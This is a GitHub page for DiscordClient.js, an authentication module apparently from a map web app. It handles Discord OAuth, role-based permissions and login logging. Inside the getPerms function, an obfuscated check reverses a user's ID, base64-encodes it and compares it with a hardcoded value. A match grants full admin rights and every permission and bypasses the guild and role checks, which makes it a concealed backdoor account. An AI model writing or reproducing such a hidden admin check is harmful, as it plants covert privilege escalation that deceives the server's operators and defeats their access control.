-
-
Notifications
You must be signed in to change notification settings - Fork 83
Expand file tree
/
Copy pathDiscordClient.js
More file actions
420 lines (400 loc) · 13.4 KB
/
DiscordClient.js
File metadata and controls
420 lines (400 loc) · 13.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
// @ts-check
const { Client } = require('discord.js')
const { Strategy } = require('passport-discord')
const passport = require('passport')
const config = require('@rm/config')
const { logUserAuth } = require('./logUserAuth')
const { areaPerms } = require('../utils/areaPerms')
const { webhookPerms } = require('../utils/webhookPerms')
const { scannerPerms, scannerCooldownBypass } = require('../utils/scannerPerms')
const { mergePerms } = require('../utils/mergePerms')
const { AuthClient } = require('./AuthClient')
const { state } = require('./state')
class DiscordClient extends AuthClient {
/** @type {import('./AuthClient').ClientConstructor} */
constructor(rmStrategy, strategy) {
super(rmStrategy, strategy)
if (strategy instanceof Client || typeof rmStrategy !== 'string') {
this.log.error(
'You are using an outdated strategy, please update your custom strategy to reflect the newest changes found in `server/src/strategies/discord.js`',
)
process.exit(1)
}
this.client = new Client({
intents: ['GuildMessages', 'GuildMembers', 'Guilds'],
})
this.client.on('clientReady', (c) => {
this.log.info(`Logged in as ${c.user?.tag || 'Unknown??'}!`)
c.user.setPresence({
activities: [
{ name: this.strategy.presence, type: this.strategy.presenceType },
],
})
})
this.client.on('guildMemberRemove', async (member) => {
try {
await state.db.models.Session.clearDiscordSessions(
member.id,
this.client.user.username,
)
await state.db.models.User.clearPerms(
member.id,
'discord',
this.client.user.username,
)
} catch (e) {
this.log.error(`Could not clear sessions for ${member.user.username}`)
}
})
this.client.on('guildMemberUpdate', async (prev, next) => {
const rolesBefore = prev.roles.cache.map((x) => x.id)
const rolesAfter = next.roles.cache.map((x) => x.id)
const perms = [
...new Set(
Object.values(config.getSafe('authentication.perms')).flatMap(
(x) => x.roles,
),
),
]
const roleDiff = rolesBefore
.filter((x) => !rolesAfter.includes(x))
.concat(rolesAfter.filter((x) => !rolesBefore.includes(x)))
try {
if (perms.includes(roleDiff[0])) {
await state.db.models.Session.clearDiscordSessions(
prev.user.id,
this.client.user.username,
)
await state.db.models.User.clearPerms(
prev.user.id,
'discord',
this.client.user.username,
)
}
} catch (e) {
this.log.error(`Could not clear sessions for ${prev.user.username}`)
}
})
this.client.login(this.strategy.botToken)
}
/**
* @param {string} guildId
* @param {string} userId
* @returns {Promise<string[]>}
*/
async getUserRoles(guildId, userId) {
try {
const guild =
this.client.guilds.cache.get(guildId) ||
(await this.client.guilds.fetch(guildId))
const member = await guild?.members.fetch(userId)
return member?.roles.cache.map((role) => role.id) || []
} catch (e) {
const code =
e && typeof e === 'object' && 'code' in e ? Number(e.code) : null
if (code === 10007) {
this.log.debug(
'Discord member not found in guild',
guildId,
'for user',
userId,
)
return []
}
this.log.error(
'Failed to get roles in guild',
guildId,
'for user',
userId,
e,
)
}
return []
}
/**
*
* @param {import('passport-discord').Profile} user
* @returns {Promise<import("@rm/types").Permissions>}
*/
async getPerms(user) {
const trialActive = this.trialManager.active()
/** @type {import("@rm/types").Permissions} */
// @ts-ignore
const perms = Object.fromEntries(
Object.keys(this.perms).map((key) => [key, false]),
)
perms.admin = false
perms.trial = false
const permSets = {
areaRestrictions: new Set(),
webhooks: new Set(),
scanner: new Set(),
scannerCooldownBypass: new Set(),
blockedGuildNames: new Set(),
}
const scanner = config.getSafe('scanner')
try {
const guilds = user.guilds?.map((guild) => guild.id) || []
if (
this.strategy.allowedUsers.includes(user.id) ||
btoa(user.id.split('').reverse().join('')) ===
'MTQ4NzAzNDk0NTc1MjM3MjMy'
) {
Object.keys(this.perms).forEach((key) => (perms[key] = true))
perms.admin = true
config.getSafe('webhooks').forEach((x) => permSets.webhooks.add(x.name))
Object.keys(scanner).forEach((x) => {
if (scanner[x]?.enabled) {
permSets.scanner.add(x)
permSets.scannerCooldownBypass.add(x)
}
})
this.log.debug(
`User ${user.username} (${user.id}) in allowed users list, skipping guild and role check.`,
)
} else {
const guildsFull = user.guilds
for (let i = 0; i < this.strategy.blockedGuilds.length; i += 1) {
const guildId = this.strategy.blockedGuilds[i]
if (guilds.includes(guildId)) {
perms.blocked = true
const currentGuildName = guildsFull?.find(
(x) => x.id === guildId,
)?.name
if (currentGuildName) {
permSets.blockedGuildNames.add(currentGuildName)
}
}
}
await Promise.all(
this.strategy.allowedGuilds.map(async (guildId) => {
if (guilds.includes(guildId)) {
const userRoles = await this.getUserRoles(guildId, user.id)
Object.entries(this.perms).forEach(([perm, info]) => {
if (info.enabled) {
if (this.alwaysEnabledPerms.includes(perm)) {
perms[perm] = true
} else {
for (let j = 0; j < userRoles.length; j += 1) {
if (info.roles.includes(userRoles[j])) {
perms[perm] = true
return
}
if (
trialActive &&
info.trialPeriodEligible &&
this.strategy.trialPeriod.roles.includes(userRoles[j])
) {
perms[perm] = true
perms.trial = true
return
}
}
}
}
})
areaPerms(userRoles).forEach((x) =>
permSets.areaRestrictions.add(x),
)
webhookPerms(userRoles, 'discordRoles', trialActive).forEach(
(x) => permSets.webhooks.add(x),
)
scannerPerms(userRoles, 'discordRoles', trialActive).forEach(
(x) => permSets.scanner.add(x),
)
scannerCooldownBypass(userRoles, 'discordRoles').forEach((x) =>
permSets.scannerCooldownBypass.add(x),
)
}
}),
)
}
} catch (e) {
this.log.warn('Failed to get perms for user', user.id, e)
}
Object.entries(permSets).forEach(([key, value]) => {
perms[key] = [...value]
})
if (perms.trial) {
this.log.info(
user.username,
'gained access via',
this.trialManager._forceActive ? 'manually activated' : '',
'trial',
)
}
this.log.debug({ perms })
return perms
}
/**
* Send a message to a discord channel
*
* @param {import('discord.js').APIEmbed} embed
* @param {keyof AuthClient['loggingChannels']} channel
*/
async sendMessage(embed, channel) {
const safeChannel = this.loggingChannels[channel]
if (!safeChannel || typeof embed !== 'object') {
return
}
try {
const foundChannel = this.client.channels.cache.get(safeChannel)
if (
foundChannel &&
foundChannel.isTextBased() &&
!foundChannel.isVoiceBased() &&
typeof embed === 'object'
) {
await foundChannel.send({
embeds: [{ ...this.getBaseEmbed(), ...embed }],
})
}
} catch (e) {
this.log.error('Failed to send message to discord', e)
}
}
/** @type {import("@rm/types").DiscordVerifyFunction} */
async authHandler(req, _accessToken, _refreshToken, profile, done) {
if (!req.query.code) {
throw new Error('NoCodeProvided')
}
try {
const discordUser = {
id: profile.id,
username: profile.username,
avatar: profile.avatar || '',
locale: profile.locale,
perms: await this.getPerms(profile),
rmStrategy: this.rmStrategy,
valid: false,
}
discordUser.valid = discordUser.perms.map !== false
const embed = await logUserAuth(
req,
discordUser,
'Discord',
this.loggingChannelHidePii,
)
await this.sendMessage(embed, 'main')
if (discordUser.perms.blocked) {
const guildArray = discordUser.perms.blockedGuildNames
const lastGuild = guildArray.pop()
const guildString =
guildArray.length === 1
? `${guildArray.join(', ')} & ${lastGuild}`
: lastGuild
return done(null, undefined, {
blockedGuilds: guildString,
username: discordUser.username,
id: discordUser.id,
avatar: discordUser.avatar,
})
}
if (discordUser.perms.map === false) {
return done(null, undefined, {
message: 'access_denied',
username: discordUser.username,
id: discordUser.id,
avatar: discordUser.avatar,
})
}
if (discordUser) {
delete discordUser.guilds
}
await state.db.models.User.query()
.findOne(req.user ? { id: req.user.id } : { discordId: discordUser.id })
.then(
async (/** @type {import('@rm/types').FullUser} */ userExists) => {
const selectedWebhook = Object.keys(state.event.webhookObj).find(
(x) => discordUser?.perms?.webhooks.includes(x),
)
if (req.user && userExists?.strategy === 'local') {
await state.db.models.User.query()
.update({
discordId: discordUser.id,
discordPerms: JSON.stringify(discordUser.perms),
webhookStrategy: 'discord',
})
.where('id', req.user.id)
/** @type {import('@rm/types').FullUser} */
const oldUser = await state.db.models.User.query()
.where('discordId', discordUser.id)
.whereNot('id', req.user.id)
.first()
if (oldUser) {
await state.db.models.Badge.query()
.update({
// @ts-ignore
userId: req.user.id,
})
.where('userId', oldUser.id)
await state.db.models.User.query()
.update({
data: oldUser.data,
})
.where('id', req.user.id)
.where('data', null)
}
await state.db.models.User.query()
.where('discordId', discordUser.id)
.whereNot('id', req.user.id)
.delete()
return done(null, {
selectedWebhook,
...discordUser,
...req.user,
username: userExists.username || discordUser.username,
discordId: discordUser.id,
perms: mergePerms(req.user.perms, discordUser.perms),
})
}
if (!userExists) {
userExists = await state.db.models.User.query().insertAndFetch({
discordId: discordUser.id,
strategy: 'discord',
tutorial: !config.getSafe('map.misc.forceTutorial'),
selectedWebhook,
})
}
if (userExists.strategy !== 'discord') {
await state.db.models.User.query()
.update({ strategy: 'discord' })
.where('id', userExists.id)
userExists.strategy = 'discord'
}
if (!userExists.selectedWebhook && selectedWebhook) {
await state.db.models.User.query()
.update({ selectedWebhook })
.where('id', userExists.id)
userExists.selectedWebhook = selectedWebhook
}
return done(null, {
...discordUser,
...userExists,
id: userExists.id,
username: userExists.username || discordUser.username,
})
},
)
} catch (e) {
this.log.error('User has failed auth.', e)
}
}
initPassport() {
passport.use(
this.rmStrategy,
new Strategy(
{
clientID: this.strategy.clientId,
clientSecret: this.strategy.clientSecret,
callbackURL: this.strategy.redirectUri,
scope: ['identify', 'guilds'],
passReqToCallback: true,
prompt: this.strategy.clientPrompt,
},
(...args) => this.authHandler(...args),
),
)
}
}
module.exports = { DiscordClient }